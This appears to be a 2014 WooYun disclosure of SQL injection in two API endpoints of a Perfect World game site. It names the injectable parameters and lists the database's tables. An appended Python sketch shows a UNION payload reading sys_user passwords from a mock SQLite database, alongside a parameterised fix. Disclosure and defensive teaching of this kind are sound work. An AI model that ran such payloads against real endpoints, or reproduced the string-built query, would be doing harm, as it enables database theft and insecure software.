WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online -------- http://drop.zone.ci/
2014-06-12: Details reported to the vendor, awaiting the vendor's response
2014-06-13: Vendor has confirmed; details disclosed to the vendor only
2014-06-23: Details disclosed to core white hats and domain experts
2014-07-03: Details disclosed to regular white hats
2014-07-13: Details disclosed to intern white hats
2014-07-27: Details disclosed to the public
Too tired today, so no bad joke this time!
Affected site:
http://aapi.sd.wanmei.com/
Took a look; a number of the API endpoints are injectable:
http://aapi.sd.wanmei.com/index.php/api/goods/getList?limit=10&offset=0&usage=
The usage parameter is injectable.
http://aapi.sd.wanmei.com/index.php/api/goods/getTransactionList?goods_id=&limit=10&offset=0
The goods_id parameter is injectable.
Databases:
[*] information_schema
[*] sdapp
[*] test
Tables:
Database: sdapp
[38 tables]
+------------------------+
| user                   |
| goods                  |
| goods_auction          |
| goods_category         |
| goods_order            |
| goods_picture          |
| goods_product          |
| goods_reserve          |
| goods_transaction      |
| log_statistics         |
| log_user_credits       |
| log_user_init          |
| module_apps            |
| module_avatar          |
| module_download_log    |
| module_feedback        |
| module_ios_comment_log |
| module_ios_push_item   |
| module_ios_token       |
| module_ios_token_temp  |
| module_message         |
| module_ring            |
| module_wallpaper       |
| news                   |
| news_comment           |
| news_share_log         |
| news_template          |
| sys_user               |
| toppic                 |
| toppic_comment         |
| toppic_comment_reply   |
| toppic_vote            |
| user_checkin_log       |
| yyl_balance            |
| yyl_log                |
| yyl_picture            |
| yyl_picture_group      |
| yyl_rank_reward        |
+------------------------+
I won't paste the rest; please fix it quickly.
Injection links:
You know the ones.
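As an added illustration, not code from the report or from the vendor's application (whose backend is unknown), the Python sketch below reproduces the class of bug behind the getList and getTransactionList endpoints against an in-memory SQLite stand-in: a usage value pasted straight into the query string lets a UNION payload read sys_user, while the bound-parameter version treats the same string as data, and the numeric goods_id is type-checked before it reaches the driver. Only the table names are taken from the dump above; the columns, rows and payloads are constructed.

```python
import sqlite3

# Constructed stand-in schema. Only the table names (goods, sys_user,
# goods_transaction) come from the report's dump; columns and rows are invented
# for illustration, and the real backend (PHP/MySQL or otherwise) is unknown.
SCHEMA = """
CREATE TABLE goods (id INTEGER PRIMARY KEY, name TEXT, usage TEXT);
INSERT INTO goods VALUES (1, 'sword', 'weapon'), (2, 'helmet', 'armor'),
                         (3, 'potion', 'consumable');
CREATE TABLE sys_user (id INTEGER PRIMARY KEY, name TEXT, password TEXT);
INSERT INTO sys_user VALUES (1, 'admin', 'constructed-password-hash');
CREATE TABLE goods_transaction (id INTEGER PRIMARY KEY, goods_id INTEGER, price INTEGER);
INSERT INTO goods_transaction VALUES (1, 1, 100), (2, 1, 120), (3, 2, 50);
"""


def make_db():
    """In-memory SQLite database loaded with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def get_list_vulnerable(conn, limit, offset, usage):
    """Query built the way the report implies: request input pasted into SQL."""
    sql = (f"SELECT id, name, usage FROM goods WHERE usage = '{usage}' "
           f"LIMIT {limit} OFFSET {offset}")
    return conn.execute(sql).fetchall()


def get_list_safe(conn, limit, offset, usage):
    """Same query with every value bound as a parameter."""
    # LIMIT/OFFSET are integers; int() rejects payloads such as "10 UNION ...".
    limit, offset = int(limit), int(offset)
    sql = "SELECT id, name, usage FROM goods WHERE usage = ? LIMIT ? OFFSET ?"
    return conn.execute(sql, (usage, limit, offset)).fetchall()


def get_transaction_list_safe(conn, goods_id, limit, offset):
    """goods_id is numeric, so validate its type before it reaches the driver."""
    if not str(goods_id).isdigit():
        raise ValueError("goods_id must be a non-negative integer")
    sql = ("SELECT id, goods_id, price FROM goods_transaction "
           "WHERE goods_id = ? LIMIT ? OFFSET ?")
    return conn.execute(sql, (int(goods_id), int(limit), int(offset))).fetchall()


if __name__ == "__main__":
    db = make_db()
    # UNION payload: the column count (3) matches the original SELECT, and the
    # trailing comment swallows the LIMIT clause the endpoint appends.
    payload = "' UNION SELECT id, name, password FROM sys_user -- "
    print("vulnerable:", get_list_vulnerable(db, 10, 0, payload))
    print("safe:      ", get_list_safe(db, 10, 0, payload))
```

The UNION payload works only because the attacker-controlled string lands inside the SQL text; binding the value as a parameter removes the problem regardless of how the string is quoted, which is why the fix is parameterisation rather than escaping.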
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2014-06-13 10:08
Thanks to the reporter for paying attention to Perfect World; this has been patched. Thank you!